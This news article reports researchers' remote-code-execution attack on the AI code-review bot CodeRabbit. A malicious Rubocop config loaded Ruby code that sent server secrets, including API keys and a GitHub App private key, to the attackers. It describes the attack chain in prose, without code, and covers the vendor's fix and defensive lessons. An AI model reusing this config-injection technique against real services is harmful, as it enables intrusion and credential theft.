CodeRabbit’s PR hack: RCE, leaked API keys and the million‑repo scare
Remote‑code execution in an AI code‑review tool allowed attackers to siphon Anthropic and OpenAI keys, a GitHub app private key and more. Here’s why the incident lit up Hacker News – and what it means for your repos.
Picture pushing a harmless pull request and suddenly owning every repository your code‑review assistant touches. That nightmare became reality for researchers who hacked CodeRabbit, one of the most popular AI‑powered review bots on GitHub. By exploiting a humble Ruby linter configuration, they achieved remote‑code execution (RCE), exfiltrated environment variables packed with secrets and even gained potential write access to one million repositories. The hack – shared at Black Hat and quickly trending on social – underscores how a single misconfiguration in AI tooling can jeopardize entire development ecosystems.
The attack chain: when Rubocop becomes a Trojan horse
Researchers from Kudelski Security tried CodeRabbit’s pro plan – which integrates third‑party static analysis tools – and noticed it passed an untrusted .rubocop.yml file directly into the Rubocop linter. By exploiting Rubocop’s require directive, they wrote an ext.rb file that collected the process’s environment variables and sent them back to their server. The steps were shockingly simple: create a trial account, add CodeRabbit to a private repository, push a dummy Ruby file along with the malicious .rubocop.yml and ext.rb, then wait. When CodeRabbit executed the linter, their code ran in the context of a production server, sending a JSON payload full of secrets.
What leaked: a goldmine of secrets
The exfiltrated environment variables read like a developer’s worst nightmares. In addition to AWS and Azure keys, the researchers saw multiple Anthropic and OpenAI API keys, encryption salts, courier notification tokens, JIRA secrets and Pinecone vectors. Most alarmingly, the payload contained CodeRabbit’s GitHub App private key, client ID and client secret. With that RSA key, an attacker could authenticate as CodeRabbit’s app, generate access tokens and clone or modify any repository the app had permission to manage. Considering CodeRabbit advertises itself as the most installed AI app on GitHub and GitLab, the blast radius would have been enormous.
| Category | Examples of leaked secrets | Risk |
|---|---|---|
| AI API keys | Anthropic (paid, free and trial), OpenAI (paid, free and trial) | Could be used to run expensive AI jobs or exfiltrate data through LLMs |
| Infrastructure & DB | PostgreSQL host/user/password, Pinecone API key, AWS & Azure secrets | Remote DB access, vector store compromise, cloud account misuse |
| DevOps tokens | GitHub App private key, GitLab tokens, Jira secrets | Read/write access to repositories, issue trackers and CI/CD pipelines |
| Encryption & auth | Encryption passwords/salts, courier notification tokens | Potential to decrypt sensitive data and hijack notifications |
The researchers stopped short of abusing the keys but demonstrated how to list all CodeRabbit installations and generate fresh access tokens. Since CodeRabbit had been installed over 80,000 times and reviews around a million repositories, the vulnerability could have enabled supply‑chain attacks at scale.
CodeRabbit’s response and lessons learned
To their credit, CodeRabbit patched the flaw rapidly. In a blog post the company stressed that no customer data was accessed and that they disabled Rubocop, rotated potentially impacted credentials and moved linters into a sandboxed environment within hours of disclosure. The case highlights the need for AI tool vendors to treat third‑party integrations as untrusted code and to isolate them accordingly. For users, it’s a reminder to audit the permissions you grant to AI assistants and to monitor for unusual API usage.
Why it matters for developers and businesses
AI code reviewers promise faster pull‑request turnaround and fewer bugs, but they also introduce new supply‑chain attack surfaces. If a malicious actor can smuggle arbitrary code through a configuration file, they may pivot from an isolated repository to a vendor’s production environment. In regulated industries, unauthorized code execution and secret leakage could trigger compliance nightmares. The CodeRabbit incident shows that security researchers are already probing AI coding tools, and vulnerabilities are being weaponized for clout on platforms like Hacker News. Protecting the CI pipeline requires sandboxing, principle‑of‑least‑privilege and constant secret rotation.
FAQs
How did the researchers get RCE? They exploited Rubocop’s require directive to load a malicious Ruby file via a .rubocop.yml configuration. When CodeRabbit’s server ran the linter, the file executed and exfiltrated environment variables.
What secrets were exposed? The payload contained multiple Anthropic and OpenAI keys, encryption salts, cloud database credentials, Jira secrets and the CodeRabbit GitHub App private key.
Did attackers actually modify repositories? The researchers didn’t. They demonstrated that the GitHub key could generate tokens with write permissions, but they stopped after confirming the impact.
Is CodeRabbit safe to use now? CodeRabbit says it immediately disabled Rubocop, rotated secrets and deployed a sandbox. Users should ensure they’re running the latest version and review the permissions they grant.
